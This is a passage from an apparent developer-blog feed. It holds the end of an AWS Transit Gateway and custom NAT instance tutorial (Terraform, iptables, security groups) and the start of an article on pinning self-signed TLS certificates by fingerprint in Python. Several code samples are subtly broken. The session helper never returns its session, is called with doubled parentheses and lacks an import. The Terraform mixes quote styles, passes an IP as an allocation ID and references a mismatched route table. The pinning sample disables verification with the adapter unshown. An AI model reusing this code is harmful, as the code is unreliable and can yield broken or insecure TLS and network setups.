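def summarize_tunnels(describe_output):
    """List (vpn_id, outside_ip, status) for every tunnel of every VPN connection.

    describe_output is the parsed JSON printed by
    'aws ec2 describe-vpn-connections'. Only the VgwTelemetry entries are read,
    so CustomerGatewayConfiguration and the tunnel options, which contain the
    pre-shared keys, are never touched.
    """
    rows = []
    for vpn in describe_output.get("VpnConnections", []):
        for tunnel in vpn.get("VgwTelemetry", []):
            rows.append((vpn.get("VpnConnectionId"),
                         tunnel.get("OutsideIpAddress"),
                         tunnel.get("Status")))
    return rows


def any_tunnel_up(describe_output):
    """True once at least one tunnel reports the UP state."""
    return any(status == "UP" for _, _, status in summarize_tunnels(describe_output))


# Hypothetical sample shaped like the CLI's JSON output (IDs and IPs are made up)
sample = {
    "VpnConnections": [{
        "VpnConnectionId": "vpn-0example",
        "VgwTelemetry": [
            {"OutsideIpAddress": "203.0.113.10", "Status": "UP"},
            {"OutsideIpAddress": "203.0.113.20", "Status": "DOWN"},
        ],
    }]
}
for vpn_id, outside_ip, status in summarize_tunnels(sample):
    print(vpn_id, outside_ip, status)
print(any_tunnel_up(sample))  # True
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;In practice, you would save the output of &lt;code&gt;aws ec2 describe-vpn-connections --output json&lt;/code&gt; to a file and pass the result of &lt;code&gt;json.load()&lt;/code&gt; on that file instead of the sample.&lt;/p&gt;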
&lt;h2&gt;
  
  
  Troubleshooting the IPSec tunnel
&lt;/h2&gt;

&lt;p&gt;Unfortunately, at the time of writing, AWS provides no way to debug the establishment of the IPsec tunnel itself, because it does not expose any logs for this stage. The use case that AWS aims to solve is connecting your own on-premises network with your own AWS VPC in the cloud; in that case, you can debug the on-premises side of the IPsec connection. However, if the customer is a third party and the IPsec connection fails, we are left at the mercy of the third party to debug the issue. &lt;/p&gt;
&lt;h2&gt;
  
  
  Terraform Configuration of the Transit Gateway
&lt;/h2&gt;

&lt;p&gt;The following Terraform resources set up the Transit Gateway and illustrate all of the settings in more detail. For brevity, name tags and some other sections have been omitted.&lt;/p&gt;

&lt;p&gt;First, we define the Transit Gateway and disable the default route table association and propagation. &lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

resource "aws_ec2_transit_gateway" "example_transit_gateway" {
  amazon_side_asn = 64512
  auto_accept_shared_attachments = "disable"
  default_route_table_association = "disable"
  default_route_table_propagation = "disable"
  description = "Example Transit Gateway."
  vpn_ecmp_support = "disable"
}


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Because we told AWS not to use a default route table for the TGW, we create one by hand:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

resource "aws_ec2_transit_gateway_route_table" "example_transit_gateway" {
  transit_gateway_id = aws_ec2_transit_gateway.example_transit_gateway.id
}


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

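&lt;p&gt;The Transit Gateway configuration is split into "routes" and "attachments": each route specifies an attachment as its destination. We first create the attachment to the VPC subnet in which the NAT gateway EC2 instance lives (here named &lt;code&gt;private_subnet6&lt;/code&gt;) and, since default route table association is disabled, associate that attachment with our route table so that packets entering the TGW from the VPC are routed by it:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

resource "aws_ec2_transit_gateway_vpc_attachment" "nat_vpc_attachment" {
  vpc_id             = module.vpc.id
  subnet_ids         = [ aws_subnet.private_subnet6.id ]
  transit_gateway_id = aws_ec2_transit_gateway.example_transit_gateway.id
  transit_gateway_default_route_table_association = false
  transit_gateway_default_route_table_propagation = false
}

# Traffic entering the TGW from the VPC is routed by the associated route table
resource "aws_ec2_transit_gateway_route_table_association" "nat_vpc_attachment" {
  transit_gateway_attachment_id  = aws_ec2_transit_gateway_vpc_attachment.nat_vpc_attachment.id
  transit_gateway_route_table_id = aws_ec2_transit_gateway_route_table.example_transit_gateway.id
}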


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Next, we add the route that tells the TGW to forward packets destined for &lt;code&gt;1.2.3.4&lt;/code&gt; to the VPC subnet we have just attached:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

resource "aws_ec2_transit_gateway_route" "nat-egress-ip" {
  destination_cidr_block = "1.2.3.4/32"
  transit_gateway_attachment_id  = aws_ec2_transit_gateway_vpc_attachment.nat_vpc_attachment.id
  transit_gateway_route_table_id = aws_ec2_transit_gateway_route_table.example_transit_gateway.id
}


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;So far we have handled the returning packets. Now let's handle the forward direction. First, we define the Customer Gateway and the Site-to-Site VPN connection, and then we tell the TGW to forward packets to it.&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

&lt;p&gt;resource "aws_customer_gateway" "example_customer" {&lt;br&gt;
  bgp_asn    = 64520&lt;br&gt;
  ip_address = '6.7.8.9' # this would be the public IP of the StrongSwan instance during test&lt;br&gt;
  type       = "ipsec.1"&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;resource "aws_vpn_connection" "example_customer" {&lt;br&gt;
  customer_gateway_id = aws_customer_gateway.example_customer.id&lt;br&gt;
  transit_gateway_id  = aws_ec2_transit_gateway.example_transit_gateway.id&lt;br&gt;
  type                = aws_customer_gateway.example_customer.type&lt;br&gt;
  static_routes_only  = false&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;resource "aws_ec2_transit_gateway_route_table_association" "example_customer" {&lt;br&gt;
  count=length(local.vpn_attachments)&lt;br&gt;
  transit_gateway_attachment_id  = aws_vpn_connection.example_customer.transit_gateway_attachment_id&lt;br&gt;
  transit_gateway_route_table_id = aws_ec2_transit_gateway_route_table.example_transit_gateway.id&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;resource "aws_ec2_transit_gateway_route" "example_customer" {&lt;br&gt;
  count=length(local.vpn_attachments)&lt;br&gt;
  destination_cidr_block         = "172.31.0.0/16"&lt;br&gt;
  transit_gateway_attachment_id  = aws_vpn_connection.example_customer.transit_gateway_attachment_id&lt;br&gt;
  transit_gateway_route_table_id = aws_ec2_transit_gateway_route_table.account_transit_gateway.id&lt;br&gt;
}&lt;/p&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h2&gt;
  
  
  Terraform Configuration of the Custom NAT Gateway Instance
&lt;/h2&gt;

&lt;p&gt;The challenge in automatically configuring the NAT gateway EC2 instance is (a) to assign an Elastic IP address and (b) to use the assigned &lt;em&gt;private&lt;/em&gt; IP in the &lt;code&gt;iptables&lt;/code&gt; rules. The solution is to first define an Elastic Network Interface (ENI) and then use it in the definition of the instance:&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

&lt;p&gt;resource "aws_network_interface" "nat_gw" {&lt;br&gt;
  source_dest_check = false # must be disabled for NAT to work&lt;br&gt;
  subnet_id = module.vpc.sn-private-nat-az1&lt;br&gt;
  security_groups = [ ... ]&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;resource "aws_eip_association" "nat_gw" {&lt;br&gt;
  network_interface_id = aws_network_interface.nat_gw.id&lt;br&gt;
  allocation_id = "1.2.3.4"&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;resource "aws_instance" "nat_gw" {&lt;br&gt;
  network_interface {&lt;br&gt;
    device_index = 0&lt;br&gt;
    network_interface_id = aws_network_interface.nat_gw.id&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;... &lt;/p&gt;

&lt;p&gt;user_data = &amp;lt;&amp;lt;EOF&lt;/p&gt;
&lt;h1&gt;
  
  
  !/bin/bash
&lt;/h1&gt;

&lt;p&gt;echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br&gt;
iptables -t nat -F&lt;br&gt;
iptables -t nat -A POSTROUTING -d 172.31.0.0/16   -j SNAT --to-source 1.2.3.4&lt;br&gt;
iptables -t nat -A PREROUTING  -d 1.2.3.4 -j DNAT --to-destination ${aws_network_interface.nat_gw.private_ip}&lt;br&gt;
EOF&lt;br&gt;
}&lt;/p&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h2&gt;
  
  
  Security Considerations
&lt;/h2&gt;

&lt;p&gt;Because we are using NAT, no instance behind the NAT GW instance can be accessed from the customer's network. However, the NAT gateway itself &lt;em&gt;can&lt;/em&gt; be reached from the customer's network. The reachable ports are limited by the AWS Security Group attached to the NAT gateway instance's network interface (Security Groups apply to network interfaces, not to subnets). For instance, the following inbound Security Group rules allow the customer's side only to ping the instance and to make HTTPS requests to it:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Type&lt;/th&gt;
&lt;th&gt;Protocol&lt;/th&gt;
&lt;th&gt;Port Range&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;HTTPS&lt;/td&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;443&lt;/td&gt;
&lt;td&gt;172.31.0.0/16&lt;/td&gt;
&lt;td&gt;Customer's side&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;All TCP&lt;/td&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;All&lt;/td&gt;
&lt;td&gt;20.0.0.0/16&lt;/td&gt;
&lt;td&gt;From inside VPC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;All ICMP - IPv4&lt;/td&gt;
&lt;td&gt;ICMP&lt;/td&gt;
&lt;td&gt;All&lt;/td&gt;
&lt;td&gt;0.0.0.0/0&lt;/td&gt;
&lt;td&gt;To allow pings&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Access can also be locked down by restricting the &lt;code&gt;DNAT&lt;/code&gt; rule in &lt;code&gt;iptables&lt;/code&gt;. If the rule is restricted to the &lt;code&gt;icmp&lt;/code&gt; protocol, as shown below, the remote side can still ping the NAT gateway at &lt;code&gt;1.2.3.4&lt;/code&gt; but cannot make HTTPS connections to it.&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

iptables -t nat -A PREROUTING  -d 1.2.3.4 -p icmp -j DNAT ...

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;We can get more mileage out of the Transit Gateway than out of the older Virtual Private Network (VPN) AWS component, because the Transit Gateway is indifferent to the source CIDR of the packets that it receives. &lt;/p&gt;

&lt;p&gt;We hope that if more companies use the TGW to connect to outside networks through NAT, AWS will support this use case directly in the Site-to-Site VPN settings, so that there is no need to maintain an EC2 instance to perform NAT. We also wish that AWS would &lt;a href="https://stackoverflow.com/questions/64686933/how-to-debug-a-site-to-site-vpn-tunnel-ipsec-on-aws" rel="noopener noreferrer"&gt;expose Site-to-Site VPN logging&lt;/a&gt; of the IPsec tunnel establishment to help with troubleshooting at that stage.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>devops</category>
      <category>systems</category>
      <category>terraform</category>
    </item>
    <item>
      <title>Verification of Self-Signed Certificates</title>
      <dc:creator>Smarking</dc:creator>
      <pubDate>Tue, 05 Jan 2021 18:53:38 +0000</pubDate>
      <link>https://dev.to/smarkinginc/verification-of-self-signed-certificates-5gee</link>
      <guid>https://dev.to/smarkinginc/verification-of-self-signed-certificates-5gee</guid>
      <description>&lt;p&gt;When interfacing to third-party web services, one often has to deal with self-signed SSL certificates that trigger verification errors. One workaround is to suppress those errors. (For instance, the Curl tool has the 'insecure' flag for this purpose.) However, at Smarking, we found ways to verify such certificates and to safeguard data communication from Man-in-the-Middle attacks. &lt;/p&gt;

&lt;p&gt;Conventionally, a web browser relies on a Public Key Infrastructure (PKI) to verify SSL certificates. Every certificate is signed by another (signing) certificate, which must in turn be signed by another, in a chain that ends at a trusted certificate. This linkage allows a web server operator to switch to a new SSL certificate without requiring visitors to the website to update their web browsers. Alternatively, the operator could ask users to trust that specific certificate, so that the browser would not need to walk up the signature chain to verify it. &lt;/p&gt;

&lt;p&gt;An SSL certificate carries the public key of the web server. On a conceptual level, the authenticity of that public key is what allows us to establish an authenticated Diffie-Hellman key exchange between the browser and the server. Thus, if we could verify that it is the correct public key, we would have "verified" the certificate. Rather than compare the long public key itself, we can compare a much shorter cryptographic hash. A hash of the entire certificate (which includes the public key) is called its &lt;em&gt;fingerprint&lt;/em&gt;, and it is conventionally formatted as a colon-separated list of hex bytes. For instance, here is the SHA-256 fingerprint of the certificate served by &lt;a href="https://google.com"&gt;https://google.com&lt;/a&gt; at the time of writing:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;14:71:16:87:6D:F6:76:8E:98:E5:66:62:70:64:F1:0F:F8:0F:87:39:B8:55:4C:47:26:22:DF:FA:7D:1D:A5:FE
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To retrieve the details of a website's certificate, click the lock icon in your browser's URL bar and then inspect the certificate details. Alternatively, you could use the following shell script:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/bash&lt;/span&gt;
&lt;span class="nv"&gt;HOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;example.com
&lt;span class="nv"&gt;PORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;443
&lt;span class="nv"&gt;PROXY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1.2.3.4:8888

&lt;span class="c"&gt;# If your environment does not require a HTTP proxy, delete the '-proxy $PROXY' parameter below&lt;/span&gt;
&lt;span class="nb"&gt;echo &lt;/span&gt;quit | openssl s_client &lt;span class="nt"&gt;-showcerts&lt;/span&gt; &lt;span class="nt"&gt;-servername&lt;/span&gt; &lt;span class="nv"&gt;$HOST&lt;/span&gt; &lt;span class="nt"&gt;-connect&lt;/span&gt; &lt;span class="nv"&gt;$HOST&lt;/span&gt;:&lt;span class="nv"&gt;$PORT&lt;/span&gt; &lt;span class="nt"&gt;-proxy&lt;/span&gt; &lt;span class="nv"&gt;$PROXY&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; result.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



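&lt;p&gt;The output file &lt;code&gt;result.txt&lt;/code&gt; includes metadata and the certificates in PEM format (with &lt;code&gt;-showcerts&lt;/code&gt;, every certificate in the chain that the server sent, starting with the server's own). The PEM format consists of binary data encoded into ASCII using Base64 and enclosed between "begin" and "end" lines like so:&lt;br&gt;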
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;-----BEGIN CERTIFICATE-----
&amp;lt;certificate encoded in base64 encoding&amp;gt;
-----END CERTIFICATE-----
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You may feed the &lt;code&gt;result.txt&lt;/code&gt; file into the following command to compute the fingerprint of the certificate. (The &lt;code&gt;openssl&lt;/code&gt; tool uses the first certificate it finds in the input file, which is the server's own certificate, and ignores everything else.)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;openssl x509 &lt;span class="nt"&gt;-noout&lt;/span&gt; &lt;span class="nt"&gt;-fingerprint&lt;/span&gt; &lt;span class="nt"&gt;-sha256&lt;/span&gt; &lt;span class="nt"&gt;-inform&lt;/span&gt; pem &lt;span class="nt"&gt;-in&lt;/span&gt; result.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;-sha256&lt;/code&gt; switch in the above command selects the SHA-256 hash algorithm, which produces a 32-byte fingerprint. Only a few hash algorithms are widely used, and each produces a different length (16 bytes for MD5, 20 for SHA-1, 32 for SHA-256), so the length of a fingerprint identifies the algorithm used to derive it.&lt;/p&gt;
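
&lt;p&gt;Both steps can be reproduced with Python's standard library. In the sketch below, whose helper names are hypothetical, a fingerprint is computed as the hash of the certificate's binary (DER) encoding, using only the first certificate in the input as &lt;code&gt;openssl&lt;/code&gt; does; the algorithm behind a given fingerprint is inferred from its length; and a certificate is compared against an expected fingerprint. Note that &lt;code&gt;ssl.get_server_certificate()&lt;/code&gt; connects directly without validating the certificate, so unlike the shell script above it does not go through an HTTP proxy.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;
import hashlib
import hmac
import re
import ssl

PEM_BLOCK = re.compile(
    r"-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----", re.DOTALL)

# Digest length in bytes of hash algorithms commonly used for fingerprints
ALGORITHM_BY_LENGTH = {16: "md5", 20: "sha1", 32: "sha256", 48: "sha384", 64: "sha512"}


def first_certificate(text):
    """Return the first PEM certificate in text (e.g. result.txt), as openssl does."""
    match = PEM_BLOCK.search(text)
    if match is None:
        raise ValueError("no PEM certificate found")
    return match.group(0)


def format_fingerprint(digest):
    """Format digest bytes as colon-separated upper-case hex, as openssl prints them."""
    return ":".join("{:02X}".format(byte) for byte in digest)


def pem_fingerprint(text, algorithm="sha256"):
    """Fingerprint of the first certificate in text: a hash of its DER encoding."""
    der = ssl.PEM_cert_to_DER_cert(first_certificate(text))
    return format_fingerprint(hashlib.new(algorithm, der).digest())


def server_fingerprint(host, port=443, algorithm="sha256"):
    """Fetch a server's certificate without validating it, then fingerprint it."""
    return pem_fingerprint(ssl.get_server_certificate((host, port)), algorithm)


def algorithm_for(fingerprint):
    """Infer the hash algorithm from the fingerprint's length in bytes."""
    length = len(bytes.fromhex(fingerprint.replace(":", "")))
    if length not in ALGORITHM_BY_LENGTH:
        raise ValueError("unrecognized fingerprint length: %d bytes" % length)
    return ALGORITHM_BY_LENGTH[length]


def fingerprint_matches(expected, der_bytes):
    """Check DER certificate bytes against an expected fingerprint."""
    expected_digest = bytes.fromhex(expected.replace(":", ""))
    actual_digest = hashlib.new(algorithm_for(expected), der_bytes).digest()
    # Constant-time comparison: a good habit, although fingerprints are not secret
    return hmac.compare_digest(actual_digest, expected_digest)


# Usage, with result.txt as produced by the shell script above:
# with open("result.txt") as f:
#     fingerprint = pem_fingerprint(f.read())
#     print(fingerprint, algorithm_for(fingerprint))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;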

&lt;p&gt;Here are three methods by which you can verify certificates by their fingerprints. &lt;/p&gt;

&lt;h2&gt;
  
  
  Method #1: Use Python
&lt;/h2&gt;

&lt;p&gt;Verification of certificates by fingerprint is supported out of the box by the &lt;code&gt;urllib3&lt;/code&gt; library through the &lt;code&gt;assert_fingerprint&lt;/code&gt; parameter:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;urllib3&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;urllib.parse&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;urlparse&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;http_get_request&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fingerprint&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
  &lt;span class="n"&gt;parsed_url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;urlparse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="n"&gt;host&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;parsed_url&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;netloc&lt;/span&gt;
  &lt;span class="n"&gt;path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;parsed_url&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;
  &lt;span class="n"&gt;pool&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;urllib3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;HTTPSConnectionPool&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;host&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;assert_fingerprint&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;fingerprint&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;urlopen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'GET'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;

&lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;http_get_request&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'https://example.com/a/b/c'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;'14:71:...'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Notice that the fingerprint option configures an &lt;code&gt;HTTPSConnectionPool&lt;/code&gt; object, which can then be used to make a &lt;em&gt;series&lt;/em&gt; of queries against a website; every query made through the pool verifies the fingerprint of the certificate.&lt;/p&gt;

&lt;p&gt;Python's &lt;code&gt;requests&lt;/code&gt; library also supports certificate fingerprint verification, because it builds upon the &lt;code&gt;urllib3&lt;/code&gt; library. It uses transport adapter objects that hand out the &lt;code&gt;HTTPSConnectionPool&lt;/code&gt; objects discussed above, and it provides a &lt;code&gt;Session.mount()&lt;/code&gt; method that attaches a custom adapter to a particular base URL. Putting this together, we have this code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;urllib.parse&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;urlparse&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;create_fingerprint_session&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fingerprint&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
  &lt;span class="n"&gt;host&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;urlparse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;netloc&lt;/span&gt;
  &lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Session&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
  &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;verify&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;
  &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;mount&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'https://{}/'&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;host&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;FingerprintAdapter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fingerprint&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="n"&gt;session&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;create_fingerprint_session&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="s"&gt;'https://example.com/a/b/c'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;'14:71:...'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;session&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
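
&lt;p&gt;The fingerprint in the call above is elided (&lt;code&gt;'14:71:...'&lt;/code&gt;). As a minimal sketch, assuming a SHA-256 fingerprint written as colon-separated hex (the format that &lt;code&gt;openssl x509 -noout -fingerprint -sha256&lt;/code&gt; prints), one could compute it with the standard library alone. The helper names &lt;code&gt;fingerprint_from_der&lt;/code&gt; and &lt;code&gt;fetch_fingerprint&lt;/code&gt; are hypothetical. Because the download is deliberately unverified, the result should be confirmed with the vendor over a channel you already trust before it is pinned.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import hashlib
import ssl


def fingerprint_from_der(der_bytes):
    """Format the SHA-256 digest of a DER certificate as 'AB:CD:...'."""
    digest = hashlib.sha256(der_bytes).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def fetch_fingerprint(host, port=443):
    """Download a server certificate WITHOUT verifying it and fingerprint it.

    Nothing is authenticated here, so confirm the result out of band.
    """
    pem = ssl.get_server_certificate((host, port))
    return fingerprint_from_der(ssl.PEM_cert_to_DER_cert(pem))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;For example, &lt;code&gt;fetch_fingerprint('example.com')&lt;/code&gt; returns a string of the form &lt;code&gt;'AB:CD:...'&lt;/code&gt; that can then be passed to &lt;code&gt;create_fingerprint_session&lt;/code&gt;.&lt;/p&gt;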



&lt;p&gt;Note that &lt;code&gt;verify&lt;/code&gt; must be set to &lt;code&gt;False&lt;/code&gt;; otherwise, the &lt;code&gt;requests&lt;/code&gt; library would also try to verify the SSL certificate in the conventional way, by its signature chain and domain name, and that check fails for a self-signed certificate.&lt;/p&gt;

&lt;p&gt;(The &lt;code&gt;verify&lt;/code&gt; parameter may also be set to the path of a file containing a concatenated list of trusted certificates in PEM format. However, a self-signed certificate is signed by a custom Certificate Authority (CA) whose certificate is usually unknown to us. Thus, we do not use this option and set &lt;code&gt;verify&lt;/code&gt; to &lt;code&gt;False&lt;/code&gt; instead.)&lt;/p&gt;

&lt;p&gt;All that remains now is to implement the &lt;code&gt;FingerprintAdapter&lt;/code&gt;. The quickest way is to subclass the &lt;code&gt;HTTPAdapter&lt;/code&gt; class and override the methods that create its pool managers, so that every &lt;code&gt;HTTPSConnectionPool&lt;/code&gt; they create receives the &lt;code&gt;assert_fingerprint&lt;/code&gt; option:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
